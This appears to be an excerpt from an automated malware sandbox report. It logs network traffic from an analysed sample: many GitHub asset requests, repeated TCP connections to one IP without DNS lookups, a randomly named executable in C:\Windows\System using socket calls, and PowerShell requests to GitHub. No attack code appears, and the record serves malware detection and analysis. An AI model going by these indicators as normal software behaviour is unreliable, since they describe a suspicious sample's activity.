Source: global traffic	HTTP traffic detected: GET /assets/dayhaysoos-c50659cac73b.jpeg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/yyx990803-e11c7b140b17.jpeg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/eslint-33bd6140c37f.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/sindresorhus-d3224f241a4d.jpeg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/homebrew-c7e38eeacb52.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/globe-d6f3f4ee645a.jpg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/footer-copilot-54114bfd1d20.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/footer-mona-d1c861cd8018.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/footer-star-36e5b5724973.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/footer-diamond-ed642fc95144.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/footer-orb-a0438104a7a2.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/footer-blur-8bc8e1f23df6.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217

Source: C:\Windows\System\ERbKWDm.exe

Code function: 5_2_00007FF67DCD4648 WSAStartup,WSARecvFrom,

5_2_00007FF67DCD4648

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/dark-9c5b7a476542.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/light-3e154969b9f9.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/primer-primitives-4cf0d59ab51a.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/primer-fefb1a332c28.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/global-103ebe55f9d9.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/github-6da540aa3f84.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/dashboard-a70f6c490d6e.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/experiments-d77f07364a5f.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/site-fbd7cf8f6ba2.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/discussions-adf1d1b8b95c.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/home-339181319b7e.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/primer-react-css.8879c83c1311e6328466.module.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/wp-runtime-f35b332dbe90.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_dompurify_dist_purify_js-b73fdff77a4e.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-56729c905fe2.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-polyfill_js-node_modules_github_mi-247092-b9c7cf3107b7.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/environment-2f240f7ed1b3.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/ui_packages_failbot_failbot_ts-aabfa4ec15fe.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_primer_behaviors_dist_esm_index_mjs-4aa4b0e95669.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-f690fd9ae3d5.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_auto-complete-element_dist_index_js-a164c5ea9f62.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_relative-time-element_dist_index_js-6d3967acd51c.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_text-expander-element_dist_index_js-e40ed7658a74.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-d1a841-8f251a0656e7.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-f4b251-f7c3b6081b19.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_s-6b2a62-6fef0f2ad42a.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-eb9d54-74622d897749.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/github-elements-36d7dcef5a08.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/element-registry-f52a50a0449b.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_primer_live-region-element_dis-428401-bb66ac5d7472.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_braintree_browser-detection_dist_browser-detection_js-node_modules_githu-bb80ec-634de60bacfa.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_lit-html_lit-html_js-ce7225a304c5.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-f3aee1-e6893db9c19e.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_morphdom_dist_morphdom-e-7c534c-f8a5485c982a.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-893f9f-6cf3320416b8.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-858e043fcf76.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_esm_js-node_modules_stacktrace-pa-a71630-67856ad29bae.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_color-convert_index_js-0e07cc183eed.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_session-resume_-9a8cd2-373766bf71f1.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/ui_packages_updatable-content_updatable-content_ts-3f4401350bd7.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_sso_ts-ui_packages-900dde-ab87c1d6c5c8.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
